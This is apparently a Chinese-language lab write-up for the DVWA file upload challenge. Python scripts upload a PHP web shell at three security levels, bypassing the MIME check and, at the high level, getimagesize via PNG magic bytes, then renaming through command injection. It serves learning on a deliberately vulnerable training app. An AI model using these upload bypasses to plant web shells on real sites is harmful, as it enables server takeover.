DVWA - File Upload (low, medium, high)

low

这个等级直接上传shell

import requests
import re

def main():
    headers = {
        'Cookie': 'PHPSESSID=jb7d875vs8rlusttoadfi1m4l5; security=low'
    }
    url = 'http://192.168.67.22/dvwa/vulnerabilities/upload/'
    data = {
        'Upload': 'Upload'
    }
    files = [('uploaded', ('wso.php', open('wso.php', 'rb'), 'application/octet-stream'))]
    res = requests.post(url, data=data, files=files, headers=headers)
    m = re.search(r'
(.*?)
'
, res.content, re.M | re.S) if m: print(m.group(1)) if __name__ == '__main__': main()

返回结果如下:

../../hackable/uploads/wso.php succesfully uploaded!
[Finished in 0.2s]

medium

查看源码,可发现代码限制了MIME类型和文件大小

if( ( $uploaded_type == "image/jpeg" || $uploaded_type == "image/png" ) && ( $uploaded_size < 100000 ) )

绕过思路,改一下MIME类型即可。

import requests
import re

def main():
    headers = {
        'Cookie': 'PHPSESSID=jb7d875vs8rlusttoadfi1m4l5; security=medium'
    }
    url = 'http://192.168.67.22/dvwa/vulnerabilities/upload/'
    data = {
        'Upload': 'Upload'
    }
    files = [('uploaded', ('wso.php', open('wso.php', 'rb'), 'image/jpeg'))]
    res = requests.post(url, data=data, files=files, headers=headers)
    m = re.search(r'
(.*?)
'
, res.content, re.M | re.S) if m: print(m.group(1)) if __name__ == '__main__': main()

high

查看源码,可发现代码限制了后缀名,文件大小和用getimagesize检查文件头并判断文件大小

// Is it an image? 
if( ( strtolower( $uploaded_ext ) == "jpg" || strtolower( $uploaded_ext ) == "jpeg" || strtolower( $uploaded_ext ) == "png" ) && ( $uploaded_size < 100000 ) && getimagesize( $uploaded_tmp ) )

绕过思路:shell的后缀名改为jpg/jpeg/png,文件头插入jpg/png/gif的头部信息绕过getimagesize,这里我用png的头部信息(前8个字节):

89 50 4E 47 0D 0A 1A 0A

注:用二/十六进制编辑器操作

import requests
import re

def main():
    headers = {
        'Cookie': 'PHPSESSID=jb7d875vs8rlusttoadfi1m4l5; security=high'
    }
    url = 'http://192.168.67.22/dvwa/vulnerabilities/upload/'
    data = {
        'Upload': 'Upload'
    }
    files = [('uploaded', ('wso.png', open('dog.php', 'rb'), 'application/octet-stream'))]
    res = requests.post(url, data=data, files=files, headers=headers)
    m = re.search(r'
(.*?)
'
, res.content, re.M | re.S) if m: print(m.group(1)) if __name__ == '__main__': main()

文件上传后,通过前面的command injection漏洞,使用mv命令将其后缀改为php。【这是一个梗,感觉上有不需要command injection的方法,希望路过的朋友指教一下】

你可能感兴趣的:(CTF)